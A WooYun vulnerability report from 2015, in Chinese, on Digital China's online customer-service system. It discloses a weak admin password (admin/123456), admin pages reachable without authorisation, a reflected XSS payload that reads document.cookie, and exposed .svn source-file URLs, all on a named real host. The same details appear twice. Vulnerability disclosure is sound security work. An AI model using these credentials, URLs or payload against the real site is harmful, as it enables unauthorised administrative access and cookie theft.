当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113150

漏洞标题:神州数码在线客服系统弱口令+越权+xss+svn

相关厂商:digitalchina.com

漏洞作者: 路人甲

提交时间:2015-05-12 16:39

修复时间:2015-05-17 16:40

公开时间:2015-05-17 16:40

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-12: 细节已通知厂商并且等待厂商处理中
2015-05-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

神州数码在线客服系统
RT
top.digitalchina.com

详细说明:

弱口令
在管理员神州数码管理员登录的页面

35.jpg


username:admin password:123456
这里可以很多管理员

36.jpg


越权访问
在这里我们可以添加管理员的!
http://top.digitalchina.com/chat/chat/admin/addUser.jsp

31.jpg


http://top.digitalchina.com/chat/chat/admin/editUser.jsp
http://top.digitalchina.com/chat/chat/admin/myAdmin.jsphttp://top.digitalchina.com/chat/chat/admin/userList.jsp
http://top.digitalchina.com/chat/chat/service/myServiceMain.jsp
http://top.digitalchina.com/chat/chat/service/myService.jsp
....
太多了
反射型xxs:
http://top.digitalchina.com/chat/login/loginClientError.jsp?msg=1'%22()%26%25<acx><ScRiPt%20>alert(document.cookie);</ScRiPt>

30.jpg


SVN
http://top.digitalchina.com/chat/chat/admin/.svn/text-base/addUser.jsp.svn-base

37.jpg


http://top.digitalchina.com/chat/chat/admin/.svn/text-base/addUser.jsp.svn-base
http://top.digitalchina.com/chat/chat/admin/.svn/text-base/myAdmin.jsp.svn-base
http://top.digitalchina.com/chat/chat/admin/.svn/text-base/userList.jsp.svn-base
http://top.digitalchina.com/chat/chat/client/.svn/text-base/clientChat.jsp.svn-base
http://top.digitalchina.com/chat/chat/service/.svn/text-base/myServiceMain.jsp.svn-base
.....
很多

漏洞证明:

弱口令
在管理员神州数码管理员登录的页面

35.jpg


username:admin password:123456
这里可以很多管理员

36.jpg


越权访问
在这里我们可以添加管理员的!
http://top.digitalchina.com/chat/chat/admin/addUser.jsp

31.jpg


http://top.digitalchina.com/chat/chat/admin/editUser.jsp
http://top.digitalchina.com/chat/chat/admin/myAdmin.jsphttp://top.digitalchina.com/chat/chat/admin/userList.jsp
http://top.digitalchina.com/chat/chat/service/myServiceMain.jsp
http://top.digitalchina.com/chat/chat/service/myService.jsp
....
太多了
反射型xxs:
http://top.digitalchina.com/chat/login/loginClientError.jsp?msg=1'%22()%26%25<acx><ScRiPt%20>alert(document.cookie);</ScRiPt>

30.jpg


SVN
http://top.digitalchina.com/chat/chat/admin/.svn/text-base/addUser.jsp.svn-base

37.jpg


http://top.digitalchina.com/chat/chat/admin/.svn/text-base/addUser.jsp.svn-base
http://top.digitalchina.com/chat/chat/admin/.svn/text-base/myAdmin.jsp.svn-base
http://top.digitalchina.com/chat/chat/admin/.svn/text-base/userList.jsp.svn-base
http://top.digitalchina.com/chat/chat/client/.svn/text-base/clientChat.jsp.svn-base
http://top.digitalchina.com/chat/chat/service/.svn/text-base/myServiceMain.jsp.svn-base
.....
很多

修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-17 16:40

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论